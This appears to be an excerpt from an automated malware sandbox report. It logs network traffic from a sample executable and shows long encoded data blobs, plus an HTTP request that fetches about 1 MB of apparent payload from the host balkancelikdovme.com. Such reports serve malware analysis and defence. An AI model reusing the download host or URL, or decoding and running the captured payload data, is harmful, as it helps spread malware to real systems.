6b 79 4d 43 6a 79 39 48 54 34 63 76 66 79 38 76 4c 36 45 31 4e 70 4d 6a 41 6f 38 76 52 31 2b 48 4c 33 38 76 4c 36 2b 68 4e 55 61 54 49 77 4b 50 4c 30 64 76 68 79 39 2f 4c 79 41 Data Ascii: YoMzcsMjFnLyQqNvL0hfsO9/Ly9vt78vLy9Ib7IvPy8vr6ZjsmKDM3LDIxYicnNSg2NvL0h/uB9/LyAvpvODAlKDUTJDUkMCg3KDU28vSI+w738vIK+mY7JigzNywyMWoxKTI1MCQ3LDIx8vSJ+6n78vIS8vz69voJ9PLy/SJkcG8XZhsX8sL29HP49vfy8voTUmkyMCjy9HT4cvfy8vL6E1NpMjAo8vR1+HL38vL6+hNUaTIwKPL0dvhy9/LyA
2023-08-23 17:30:34 UTC	928	IN	Data Raw: 41 77 4c 44 66 79 39 36 45 49 35 76 50 79 38 68 50 38 46 69 77 39 4b 48 41 70 61 53 67 6b 4d 78 55 6f 4e 69 67 31 4f 53 6a 79 39 36 49 49 35 76 50 79 38 68 76 38 46 69 77 39 4b 48 41 70 61 53 67 6b 4d 32 51 79 4d 44 41 73 4e 2f 4c 33 6f 77 6a 6d 38 2f 4c 79 49 2f 78 74 4d 69 51 6e 4b 44 56 6e 4c 79 51 71 4e 76 4c 33 70 41 67 31 38 2f 4c 79 4b 2f 78 76 4f 44 41 6c 4b 44 56 77 4b 52 55 35 4a 47 49 78 4a 78 59 73 50 53 67 32 38 76 65 6c 43 44 58 7a 38 76 49 76 2f 47 55 6b 4e 79 52 6c 4c 44 55 6f 4a 6a 63 79 4e 54 7a 79 39 36 59 49 2b 50 66 79 38 6a 50 79 2b 47 70 75 59 6d 68 6d 49 6e 41 54 46 32 70 77 62 32 4a 74 49 6d 6c 6d 59 6d 56 6d 46 56 64 56 38 76 65 6e 43 41 6a 33 38 76 4c 34 45 32 70 75 59 6d 68 6d 49 6e 41 54 46 32 70 77 62 32 4a 74 49 6d 6c 6d 59 Data Ascii: AwLDfy96EI5vPy8hP8Fiw9KHApaSgkMxUoNig1OSjy96II5vPy8hv8Fiw9KHApaSgkM2QyMDAsN/L3owjm8/LyI/xtMiQnKDVnLyQqNvL3pAg18/LyK/xvODAlKDVwKRU5JGIxJxYsPSg28velCDXz8vIv/GUkNyRlLDUoJjcyNTzy96YI+Pfy8jPy+GpuYmhmInATF2pwb2JtImlmYmVmFVdV8venCAj38vL4E2puYmhmInATF2pwb2JtImlmY
2023-08-23 17:30:34 UTC	944	IN	Data Raw: 48 79 2f 66 31 71 42 66 4c 79 39 67 58 7a 39 66 72 39 2f 56 76 39 58 50 66 7a 42 66 4c 79 39 2f 2f 79 39 66 70 62 2f 56 7a 33 61 67 56 5a 2f 66 4c 79 2b 50 2f 79 39 51 42 62 2f 56 7a 33 61 67 56 5a 2f 66 4c 79 2b 51 48 79 2f 66 33 79 38 76 6f 46 38 2f 58 36 2f 66 64 62 2f 56 7a 33 38 77 58 79 38 76 76 2f 38 6d 6f 46 57 66 66 79 38 76 7a 2f 38 76 58 36 57 2f 31 63 39 32 6f 46 57 66 66 79 38 76 30 49 38 76 58 36 57 2f 31 63 2f 57 6f 46 38 76 4c 2b 43 50 4c 31 2b 6c 76 39 58 50 64 71 42 66 4c 79 2f 77 58 7a 2f 66 31 62 2f 56 7a 33 38 77 58 79 38 67 41 4a 38 2f 58 36 2f 66 31 62 2f 56 7a 33 38 77 58 79 38 67 48 2f 38 6d 6f 46 38 76 49 43 2f 2f 4c 31 2b 6c 76 39 58 50 64 71 42 66 4c 79 41 2f 50 7a 61 67 58 7a 42 66 4c 79 42 45 4c 79 61 67 56 51 2f 66 4c 79 42 Data Ascii: Hy/f1qBfLy9gXz9fr9/Vv9XPfzBfLy9//y9fpb/Vz3agVZ/fLy+P/y9QBb/Vz3agVZ/fLy+QHy/f3y8voF8/X6/fdb/Vz38wXy8vv/8moFWffy8vz/8vX6W/1c92oFWffy8v0I8vX6W/1c/WoF8vL+CPL1+lv9XPdqBfLy/wXz/f1b/Vz38wXy8gAJ8/X6/f1b/Vz38wXy8gH/8moF8vIC//L1+lv9XPdqBfLyA/PzagXzBfLyBELyagVQ/fLyB
2023-08-23 17:30:34 UTC	960	IN	Data Raw: 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 Data Ascii: Ly8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8
2023-08-23 17:30:34 UTC	976	IN	Data Raw: 4c 79 39 50 4c 79 38 76 4c 79 38 76 62 79 35 66 4d 55 6b 66 4c 30 38 76 4c 79 38 76 4c 79 2f 76 54 79 38 76 4c 79 38 76 4c 7a 38 68 54 2b 39 50 4c 79 38 76 4c 79 38 67 48 30 38 76 4c 79 38 76 4c 79 39 76 4c 6c 38 78 53 52 41 66 54 79 38 76 4c 79 38 76 49 47 39 50 4c 79 38 76 4c 79 38 76 50 79 46 41 62 30 38 76 4c 79 38 76 4c 79 43 66 54 79 38 76 4c 79 38 76 4c 32 38 75 58 7a 46 4a 45 4a 39 50 4c 79 38 76 4c 79 38 6b 58 30 38 76 4c 79 38 76 4c 79 38 2f 49 55 52 66 54 79 38 76 4c 79 38 76 4a 49 39 50 4c 79 38 76 4c 79 38 76 62 79 35 66 4d 55 6b 66 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4b 43 38 2f 4c 79 38 76 4c 79 38 70 7a 7a 38 76 4c 79 38 76 4c 79 38 2f 49 62 6e 50 50 79 38 76 4c 79 38 76 4b 6d 38 2f 4c 79 38 76 4c 79 38 76 62 79 35 Data Ascii: Ly9PLy8vLy8vby5fMUkfL08vLy8vLy/vTy8vLy8vLz8hT+9PLy8vLy8gH08vLy8vLy9vLl8xSRAfTy8vLy8vIG9PLy8vLy8vPyFAb08vLy8vLyCfTy8vLy8vL28uXzFJEJ9PLy8vLy8kX08vLy8vLy8/IURfTy8vLy8vJI9PLy8vLy8vby5fMUkfLy8vLy8vLy8vLy8vLy8vKC8/Ly8vLy8pzz8vLy8vLy8/IbnPPy8vLy8vKm8/Ly8vLy8vby5
2023-08-23 17:30:34 UTC	992	IN	Data Raw: 6a 30 38 76 49 72 66 50 4c 79 2f 2f 4c 79 38 76 58 7a 6e 50 4c 79 38 76 62 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 67 54 30 38 76 4a 59 42 2f 4c 79 41 50 4c 79 38 76 58 7a 42 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 6d 6e 30 38 76 4a 34 42 50 4c 79 41 66 4c 79 38 76 58 7a 50 76 4c 79 38 76 50 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 54 7a 63 6f 4f 7a 66 79 38 76 49 53 43 76 4c 79 38 2f 4c 79 38 76 58 7a 55 2f 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 54 79 63 6b 4e 79 54 79 38 76 4a 52 38 76 4c 79 39 50 4c 79 38 76 58 7a 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 54 79 55 32 4e 76 4c 79 38 76 4a 68 2b 2f 4c 79 2b 50 4c 79 38 Data Ascii: j08vIrfPLy//Ly8vXznPLy8vby8vLy8vLy8vLy8vLy8vLy8gT08vJYB/LyAPLy8vXzBvLy8vLy8vLy8vLy8vLy8vLy8vLy8mn08vJ4BPLyAfLy8vXzPvLy8vPy8vLy8vLy8vLy8vLyTzcoOzfy8vISCvLy8/Ly8vXzU/Ly8vLy8vLy8vLy8vLy8vLyTyckNyTy8vJR8vLy9PLy8vXz8vLy8vLy8vLy8vLy8vLy8vLyTyU2NvLy8vJh+/Ly+PLy8
2023-08-23 17:30:34 UTC	1008	IN	Data Raw: 38 6d 38 69 49 69 4d 43 77 78 4b 6a 6f 33 4b 7a 55 69 4e 54 67 78 49 69 34 6f 50 43 49 6e 4e 7a 49 31 4e 6b 38 7a 4a 44 55 33 54 31 48 79 49 69 49 77 4c 44 45 71 4f 6a 63 72 4e 53 49 6d 4e 76 49 75 4b 44 77 69 4a 7a 63 79 4e 53 49 76 4c 44 59 33 38 69 49 69 49 6a 70 58 56 53 49 77 4c 44 45 71 4f 6a 63 72 4e 53 49 6b 4a 79 63 69 4c 69 67 38 49 69 63 33 4d 6a 58 79 49 69 49 77 4c 44 45 71 4f 6a 63 72 4e 53 49 6d 4e 69 49 73 4d 53 77 33 38 69 49 69 49 6a 70 58 56 53 49 77 4c 44 45 71 4f 6a 63 72 4e 53 49 31 4b 44 41 79 4f 53 67 69 4c 69 67 38 49 69 63 33 4d 6a 58 79 49 69 49 77 4c 44 45 71 4f 69 49 58 62 52 59 6d 4a 43 38 76 4a 53 51 6d 4c 76 4a 6c 4c 79 39 6d 4d 54 63 31 50 42 4d 79 4c 44 45 33 38 69 49 69 49 68 55 59 62 78 64 71 62 6d 59 69 45 78 5a 6d 47 Data Ascii: 8m8iIiMCwxKjo3KzUiNTgxIi4oPCInNzI1Nk8zJDU3T1HyIiIwLDEqOjcrNSImNvIuKDwiJzcyNSIvLDY38iIiIjpXVSIwLDEqOjcrNSIkJyciLig8Iic3MjXyIiIwLDEqOjcrNSImNiIsMSw38iIiIjpXVSIwLDEqOjcrNSI1KDAyOSgiLig8Iic3MjXyIiIwLDEqOiIXbRYmJC8vJSQmLvJlLy9mMTc1PBMyLDE38iIiIhUYbxdqbmYiExZmG

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.3	49736	185.181.116.217	443	C:\Users\user\Desktop\0vJrK0NCd1.exe

Timestamp	kBytes transferred	Direction	Data
2023-08-23 17:31:18 UTC	1012	OUT	GET /work/Elpuxpkilck HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: balkancelikdovme.com
2023-08-23 17:31:18 UTC	1012	IN	HTTP/1.1 200 OK Connection: close last-modified: Tue, 22 Aug 2023 08:42:22 GMT accept-ranges: bytes content-length: 1036168 date: Wed, 23 Aug 2023 17:31:18 GMT vary: User-Agent alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
2023-08-23 17:31:18 UTC	1012	IN	Data Raw: 53 30 6c 4b 52 6d 46 57 48 42 64 43 59 55 52 6f 49 69 49 58 59 55 52 46 52 69 46 48 53 30 6c 4b 49 69 4a 45 59 55 56 45 56 6c 68 46 52 45 4a 68 4c 43 67 6b 4a 44 45 39 4f 43 77 7a 4e 44 6b 6d 4f 79 6f 32 4a 44 4d 36 4a 7a 45 6c 50 44 73 76 4c 54 67 36 4f 53 6b 6b 4f 44 67 32 4a 43 34 77 4a 44 49 6f 4b 7a 4d 79 4b 79 77 6c 4c 44 59 6e 4f 44 6b 30 4e 69 30 72 4a 53 51 73 4a 6a 30 33 50 54 59 78 4e 79 67 6f 4f 7a 63 32 4e 43 30 6e 50 53 77 34 4c 54 63 73 4d 30 74 4a 53 6b 5a 68 56 68 77 58 51 6d 46 45 61 43 49 69 46 32 46 45 52 55 59 68 52 30 74 4a 53 69 49 69 52 47 46 46 52 46 5a 59 52 55 52 43 59 57 59 76 4d 7a 67 37 4d 79 34 73 4c 79 59 75 53 30 6c 4b 52 6d 46 57 48 42 64 43 59 55 52 6f 49 69 49 58 59 55 52 46 52 69 46 48 53 30 6c 4b 49 69 4a 45 59 55 56 Data Ascii: S0lKRmFWHBdCYURoIiIXYURFRiFHS0lKIiJEYUVEVlhFREJhLCgkJDE9OCwzNDkmOyo2JDM6JzElPDsvLTg6OSkkODg2JC4wJDIoKzMyKywlLDYnODk0Ni0rJSQsJj03PTYxNygoOzc2NC0nPSw4LTcsM0tJSkZhVhwXQmFEaCIiF2FERUYhR0tJSiIiRGFFRFZYRURCYWYvMzg7My4sLyYuS0lKRmFWHBdCYURoIiIXYURFRiFHS0lKIiJEYUV
2023-08-23 17:31:18 UTC	1013	IN	Data Raw: 78 6c 4e 58 6a 6c 77 34 2b 68 4b 39 38 39 72 64 79 50 64 68 47 78 44 4e 75 57 53 7a 59 68 73 56 31 30 52 51 4c 68 72 42 75 42 5a 65 57 31 6e 49 4d 6d 4e 6a 75 2b 79 47 51 59 56 44 2f 51 30 4e 66 71 31 46 77 52 31 7a 45 4a 42 6a 74 78 56 69 53 48 55 69 32 51 46 79 62 47 41 62 7a 33 34 57 74 53 46 4c 41 33 38 55 57 53 35 61 77 6b 35 4b 4c 2f 70 2b 62 35 47 30 7a 68 73 55 75 74 65 4b 65 6b 32 7a 2f 56 50 71 79 62 39 63 4b 78 59 65 2f 39 55 63 38 43 4a 46 4b 46 37 49 54 59 66 45 50 75 4b 31 75 31 4a 52 50 2f 74 69 58 57 42 49 4c 6c 6f 55 52 49 41 47 77 58 55 4c 76 41 53 7a 64 57 72 76 78 6c 4b 34 2f 62 72 36 74 77 4e 32 46 45 73 57 53 77 6a 50 62 73 6f 70 2b 32 58 51 61 30 73 38 41 32 4e 44 55 38 6b 72 46 6d 76 44 78 59 42 31 53 50 72 2b 51 72 77 44 7a 65 76 Data Ascii: xlNXjlw4+hK989rdyPdhGxDNuWSzYhsV10RQLhrBuBZeW1nIMmNju+yGQYVD/Q0Nfq1FwR1zEJBjtxViSHUi2QFybGAbz34WtSFLA38UWS5awk5KL/p+b5G0zhsUuteKek2z/VPqyb9cKxYe/9Uc8CJFKF7ITYfEPuK1u1JRP/tiXWBILloURIAGwXULvASzdWrvxlK4/br6twN2FEsWSwjPbsop+2XQa0s8A2NDU8krFmvDxYB1SPr+QrwDzev
2023-08-23 17:31:18 UTC	1028	IN	Data Raw: 5a 6b 4b 6e 41 32 45 48 45 4d 51 50 55 39 44 55 42 5a 50 6c 6b 2b 46 54 6b 57 4a 79 51 6b 63 54 30 37 4e 6a 41 30 4d 79 6c 66 4a 45 67 70 54 44 71 79 4b 72 38 6c 74 44 72 47 50 64 38 38 32 7a 33 6b 50 64 73 31 67 6b 42 35 4b 58 30 6d 69 43 69 6b 4c 71 4d 6a 72 43 61 6b 4f 70 59 30 71 43 34 59 50 47 77 6e 39 6a 67 50 4b 51 59 6a 2b 54 74 65 4e 56 73 35 55 79 5a 71 50 6d 4d 30 50 43 4e 42 4b 53 77 6c 4f 6a 78 57 4e 45 51 39 54 79 79 34 4c 4c 59 39 78 7a 54 41 4c 39 4d 71 33 45 48 57 4d 64 55 6b 6b 43 4f 43 4a 33 30 30 66 54 69 77 4d 5a 4a 41 61 79 67 43 4f 67 6b 32 4d 7a 68 61 4a 62 4d 2b 75 69 2f 68 50 4e 73 6a 65 43 61 4c 4e 35 49 6a 6d 7a 65 68 4f 78 59 39 42 45 44 2b 50 51 42 78 7a 30 46 52 4e 6c 34 78 78 79 37 6b 4d 2b 41 38 65 7a 36 66 4c 36 59 75 44 Data Ascii: ZkKnA2EHEMQPU9DUBZPlk+FTkWJyQkcT07NjA0MylfJEgpTDqyKr8ltDrGPd882z3kPds1gkB5KX0miCikLqMjrCakOpY0qC4YPGwn9jgPKQYj+TteNVs5UyZqPmM0PCNBKSwlOjxWNEQ9Tyy4LLY9xzTAL9Mq3EHWMdUkkCOCJ300fTiwMZJAaygCOgk2MzhaJbM+ui/hPNsjeCaLN5IjmzehOxY9BED+PQBxz0FRNl4xxy7kM+A8ez6fL6YuD
2023-08-23 17:31:18 UTC	1044	IN	Data Raw: 62 47 75 73 6d 38 78 72 2f 47 7a 63 37 4f 78 62 61 36 78 72 2f 42 76 64 47 33 79 38 44 50 76 37 76 4c 78 4e 47 35 74 38 4c 4a 76 62 79 38 7a 64 47 36 75 38 44 52 79 4d 50 4f 77 38 72 48 76 38 50 48 78 74 48 4a 77 4d 75 36 75 72 37 41 79 63 6a 52 7a 73 62 50 75 62 71 35 76 38 57 36 79 73 32 33 75 73 44 42 79 63 71 35 79 62 72 43 75 38 6d 2f 52 4d 72 52 77 6d 6d 30 76 54 36 6f 54 37 6f 7a 6f 6b 69 2f 7a 53 71 39 7a 4d 56 4d 74 72 6a 44 54 72 71 37 76 44 4c 4f 76 62 63 6b 79 4d 64 45 61 73 76 4e 51 78 7a 4e 79 4d 5a 50 78 72 38 69 68 2b 48 42 77 4b 54 49 30 63 37 47 30 4c 6d 37 75 63 44 46 75 38 72 4b 74 37 76 41 76 73 6e 4c 75 63 61 36 79 62 76 47 76 38 62 4b 7a 73 37 46 75 62 72 4a 76 35 75 36 7a 33 43 4d 76 39 47 2b 76 63 72 43 30 62 61 33 78 4d 6d 36 76 Data Ascii: bGusm8xr/Gzc7Oxba6xr/BvdG3y8DPv7vLxNG5t8LJvby8zdG6u8DRyMPOw8rHv8PHxtHJwMu6ur7AycjRzsbPubq5v8W6ys23usDBycq5ybrCu8m/RMrRwmm0vT6oT7ozoki/zSq9zMVMtrjDTrq7vDLOvbckyMdEasvNQxzNyMZPxr8ih+HBwKTI0c7G0Lm7ucDFu8rKt7vAvsnLuca6ybvGv8bKzs7FubrJv5u6z3CMv9G+vcrC0ba3xMm6v
2023-08-23 17:31:18 UTC	1060	IN	Data Raw: 37 45 30 59 65 2f 78 4d 53 47 30 63 61 37 69 37 71 39 76 59 44 4a 78 38 71 4f 78 74 43 79 65 37 6e 41 78 6e 76 4b 79 73 44 62 77 4c 34 58 7a 62 6e 47 74 65 6d 37 78 72 6a 6d 79 73 35 67 76 62 6d 36 79 63 43 2b 76 64 43 33 7a 4d 44 4f 76 37 7a 4c 78 64 47 32 74 38 50 4a 75 72 79 39 7a 63 36 36 75 73 44 4f 79 4d 4c 4f 78 4d 72 48 76 38 54 48 78 74 48 47 77 4d 75 36 76 62 37 41 79 63 66 52 7a 73 62 51 75 62 75 35 77 4d 57 37 79 73 71 33 75 38 43 2b 79 63 75 35 78 72 72 4a 75 38 61 2f 78 73 70 6e 7a 70 79 32 76 63 61 6d 77 62 72 51 72 73 75 2f 7a 71 61 37 7a 4d 57 59 75 62 6a 44 6f 4c 32 37 76 5a 54 52 76 62 71 70 30 63 66 43 6c 38 50 4e 78 36 62 44 79 4d 61 59 79 52 66 4c 6f 37 71 2b 77 4d 6e 48 30 63 37 47 30 4c 6d 37 75 63 44 46 75 38 72 4b 75 4c 74 73 31 Data Ascii: 7E0Ye/xMSG0ca7i7q9vYDJx8qOxtCye7nAxnvKysDbwL4XzbnGtem7xrjmys5gvbm6ycC+vdC3zMDOv7zLxdG2t8PJury9zc66usDOyMLOxMrHv8THxtHGwMu6vb7AycfRzsbQubu5wMW7ysq3u8C+ycu5xrrJu8a/xspnzpy2vcamwbrQrsu/zqa7zMWYubjDoL27vZTRvbqp0cfCl8PNx6bDyMaYyRfLo7q+wMnH0c7G0Lm7ucDFu8rKuLts1
2023-08-23 17:31:18 UTC	1076	IN	Data Raw: 62 4b 7a 73 37 46 75 62 72 47 76 37 36 39 30 4c 66 4d 77 4d 36 2f 76 4d 76 46 30 62 61 33 77 38 6d 36 76 4c 33 4e 7a 72 71 36 77 4d 37 49 77 73 37 45 79 73 65 2f 78 4d 66 47 30 63 62 41 79 37 71 39 76 73 44 4a 78 39 48 4f 78 74 43 35 75 37 6e 41 78 62 76 4b 79 72 65 37 77 4c 37 4a 79 37 6e 47 75 73 6d 37 78 72 2f 47 79 73 37 4f 78 62 6d 36 78 72 2b 2b 76 64 43 33 7a 4d 44 4f 76 37 7a 4c 78 64 47 32 74 38 50 4a 75 72 79 39 7a 63 36 36 75 73 44 4f 79 4d 4c 4f 78 4d 72 48 76 38 54 48 78 74 48 47 77 4d 75 36 76 62 37 41 79 63 66 52 7a 73 62 51 75 62 75 35 77 4d 57 37 79 73 71 33 75 38 43 2b 79 63 75 35 78 72 72 4a 75 38 61 2f 78 73 72 4f 7a 73 57 35 75 73 61 2f 76 72 33 51 74 38 7a 41 7a 72 2b 38 79 38 58 52 74 72 66 44 79 62 71 38 76 63 33 4f 75 72 72 41 7a Data Ascii: bKzs7FubrGv7690LfMwM6/vMvF0ba3w8m6vL3Nzrq6wM7Iws7Eyse/xMfG0cbAy7q9vsDJx9HOxtC5u7nAxbvKyre7wL7Jy7nGusm7xr/Gys7Oxbm6xr++vdC3zMDOv7zLxdG2t8PJury9zc66usDOyMLOxMrHv8THxtHGwMu6vb7AycfRzsbQubu5wMW7ysq3u8C+ycu5xrrJu8a/xsrOzsW5usa/vr3Qt8zAzr+8y8XRtrfDybq8vc3OurrAz
2023-08-23 17:31:18 UTC	1092	IN	Data Raw: 62 52 78 73 44 4c 75 72 32 2b 77 4d 6e 48 30 63 37 47 30 4c 6d 37 75 63 44 46 75 38 72 4b 74 37 76 41 76 73 6e 4c 75 63 61 36 79 62 76 47 76 38 62 4b 7a 73 37 46 75 62 72 47 76 37 36 39 30 4c 66 4d 77 4d 36 2f 76 4d 76 46 30 62 61 33 77 38 6d 36 76 4c 33 4e 7a 72 71 36 77 4d 37 49 77 73 37 45 79 73 65 2f 78 4d 66 47 30 63 62 41 79 37 71 39 76 73 44 4a 78 39 48 4f 78 74 43 35 75 37 6e 41 78 62 76 4b 79 72 65 37 77 4c 37 4a 79 37 6e 47 75 73 6d 37 78 72 2f 47 79 73 37 4f 78 62 6d 36 78 72 2b 2b 76 64 43 33 7a 4d 44 4f 76 37 7a 4c 78 64 47 32 74 38 50 4a 75 72 79 39 7a 63 36 36 75 73 44 4f 79 4d 4c 4f 78 4d 72 48 76 38 54 48 78 74 48 47 77 4d 75 36 76 62 37 41 79 63 66 52 7a 73 62 51 75 62 75 35 77 4d 57 37 79 73 71 33 75 38 43 2b 79 63 75 35 78 72 72 4a 75 Data Ascii: bRxsDLur2+wMnH0c7G0Lm7ucDFu8rKt7vAvsnLuca6ybvGv8bKzs7FubrGv7690LfMwM6/vMvF0ba3w8m6vL3Nzrq6wM7Iws7Eyse/xMfG0cbAy7q9vsDJx9HOxtC5u7nAxbvKyre7wL7Jy7nGusm7xr/Gys7Oxbm6xr++vdC3zMDOv7zLxdG2t8PJury9zc66usDOyMLOxMrHv8THxtHGwMu6vb7AycfRzsbQubu5wMW7ysq3u8C+ycu5xrrJu
2023-08-23 17:31:18 UTC	1108	IN	Data Raw: 45 4b 43 41 6a 39 2b 50 34 4a 45 55 6a 41 34 4d 55 4d 2b 52 45 48 2f 77 46 4d 2f 76 50 32 41 76 51 4c 2b 47 49 47 5a 63 66 4b 78 2f 5a 6e 41 76 4c 33 2f 51 73 65 42 41 67 47 2f 2f 74 53 43 67 35 69 44 51 73 52 55 4c 79 2f 75 38 6f 50 2b 41 58 33 47 77 54 31 39 51 42 51 78 56 76 47 41 76 76 2f 4a 46 70 6f 48 52 4e 71 47 45 57 39 30 42 48 35 41 6d 6f 4b 44 76 56 56 44 42 44 34 43 50 2f 2f 2b 78 62 4e 73 62 6f 45 42 66 73 48 2b 47 6a 36 44 67 63 43 5a 51 49 41 44 67 55 47 44 76 30 57 76 67 54 4a 58 67 37 34 42 78 2f 30 42 66 62 37 2b 2f 34 4e 59 62 65 70 77 4c 35 67 39 76 4a 66 2f 66 2f 36 47 66 6f 41 44 51 33 34 43 50 59 54 78 71 61 2b 43 50 55 43 4b 76 77 49 41 76 33 35 2b 50 6d 32 74 77 49 50 2f 2f 38 50 45 46 6e 2b 39 41 55 50 2b 76 64 6e 78 67 54 48 76 Data Ascii: EKCAj9+P4JEUjA4MUM+REH/wFM/vP2AvQL+GIGZcfKx/ZnAvL3/QseBAgG//tSCg5iDQsRULy/u8oP+AX3GwT19QBQxVvGAvv/JFpoHRNqGEW90BH5AmoKDvVVDBD4CP//+xbNsboEBfsH+Gj6DgcCZQIADgUGDv0WvgTJXg74Bx/0Bfb7+/4NYbepwL5g9vJf/f/6GfoADQ34CPYTxqa+CPUCKvwIAv35+Pm2twIP//8PEFn+9AUP+vdnxgTHv
2023-08-23 17:31:18 UTC	1124	IN	Data Raw: 37 41 79 63 66 52 61 74 49 42 75 52 2f 6b 47 4d 55 66 33 2b 4b 33 48 2b 33 6d 79 63 75 35 78 62 72 4a 75 38 61 2f 78 73 72 4f 7a 6d 66 6b 63 73 59 61 55 35 6e 51 74 38 7a 41 7a 72 2b 38 79 38 58 52 74 72 66 44 59 2b 2f 31 76 63 33 4f 48 72 72 41 7a 73 6a 46 30 63 50 4e 78 37 2f 45 78 38 62 52 78 72 72 4c 46 56 5a 68 77 4d 6e 48 30 63 35 69 33 41 69 37 46 65 31 70 75 32 37 66 72 37 73 65 36 79 4c 4c 75 63 62 42 79 62 76 47 76 38 62 4b 7a 73 37 46 46 65 38 50 76 78 6c 57 46 62 66 4d 77 4d 36 2f 76 4d 76 46 30 62 61 33 77 38 6b 67 38 54 66 4e 7a 72 6f 65 77 4d 37 49 77 74 48 44 7a 63 69 2f 78 4d 66 47 30 63 62 41 79 72 6f 55 55 77 58 4a 78 39 48 4f 78 6d 7a 6c 43 72 6b 65 32 42 58 4b 62 75 49 70 77 4c 37 4a 30 62 6e 47 75 73 6d 37 78 72 2f 47 79 6d 72 62 4c Data Ascii: 7AycfRatIBuR/kGMUf3+K3H+3mycu5xbrJu8a/xsrOzmfkcsYaU5nQt8zAzr+8y8XRtrfDY+/1vc3OHrrAzsjF0cPNx7/Ex8bRxrrLFVZhwMnH0c5i3Ai7Fe1pu27fr7se6yLLucbBybvGv8bKzs7FFe8PvxlWFbfMwM6/vMvF0ba3w8kg8TfNzroewM7IwtHDzci/xMfG0cbAyroUUwXJx9HOxmzlCrke2BXKbuIpwL7J0bnGusm7xr/GymrbL
2023-08-23 17:31:18 UTC	1140	IN	Data Raw: 44 4f 76 37 7a 4c 78 64 47 32 74 38 50 4a 75 72 79 39 7a 63 36 36 75 73 44 4f 4f 6a 35 72 61 47 70 6b 4c 6a 56 41 5a 6d 39 78 4b 33 41 6d 4d 53 63 6f 63 54 4d 37 50 44 51 38 4c 79 73 6b 4a 7a 6f 66 62 54 59 78 4c 79 30 67 4e 54 51 61 4e 72 72 4a 75 38 61 2f 78 73 72 4f 7a 73 57 35 75 73 61 2f 76 72 33 51 74 38 7a 41 7a 72 2b 38 79 38 58 52 74 72 66 44 79 62 71 38 76 63 33 4f 75 72 72 41 7a 73 6a 43 7a 73 54 4b 78 37 2f 45 78 38 62 52 78 73 44 4c 75 72 32 2b 77 4d 6e 48 30 63 37 47 30 4c 6d 37 75 63 44 46 75 38 72 4b 74 37 76 41 76 73 6e 4c 75 63 61 36 79 62 76 47 76 38 62 4b 7a 73 37 46 75 62 72 47 4b 69 73 74 63 53 51 7a 49 57 73 75 49 47 35 6b 4f 43 67 77 5a 54 38 68 4d 43 45 2b 63 53 34 75 4d 48 45 34 4e 6e 45 30 50 6a 6b 78 4e 44 6b 36 50 7a 6f 77 50 Data Ascii: DOv7zLxdG2t8PJury9zc66usDOOj5raGpkLjVAZm9xK3AmMScocTM7PDQ8LyskJzofbTYxLy0gNTQaNrrJu8a/xsrOzsW5usa/vr3Qt8zAzr+8y8XRtrfDybq8vc3OurrAzsjCzsTKx7/Ex8bRxsDLur2+wMnH0c7G0Lm7ucDFu8rKt7vAvsnLuca6ybvGv8bKzs7FubrGKistcSQzIWsuIG5kOCgwZT8hMCE+cS4uMHE4NnE0PjkxNDk6PzowP
2023-08-23 17:31:18 UTC	1156	IN	Data Raw: 62 2b 42 52 49 42 42 66 35 64 79 67 49 41 43 76 59 43 43 78 55 48 2b 67 52 4f 78 72 2f 47 79 76 67 4b 42 67 2f 31 41 45 76 37 2f 76 72 79 58 38 44 4f 76 37 7a 2b 42 76 76 2b 39 41 4e 6a 2f 2f 38 50 45 46 6d 36 48 74 35 51 79 47 54 6d 4f 73 70 6e 34 55 4c 48 61 4f 66 51 77 47 70 67 36 62 34 67 35 30 66 52 63 4f 4f 6d 75 62 75 35 43 63 57 37 79 73 71 33 48 4c 62 71 79 57 70 52 34 72 70 6c 79 41 2b 2f 61 4c 6d 66 7a 6d 48 4b 34 63 59 68 77 69 37 51 47 62 6c 64 7a 69 43 2f 42 4d 56 77 73 70 6e 44 5a 63 64 38 76 57 6e 52 69 72 6f 68 79 4d 4c 43 62 63 52 47 78 79 44 46 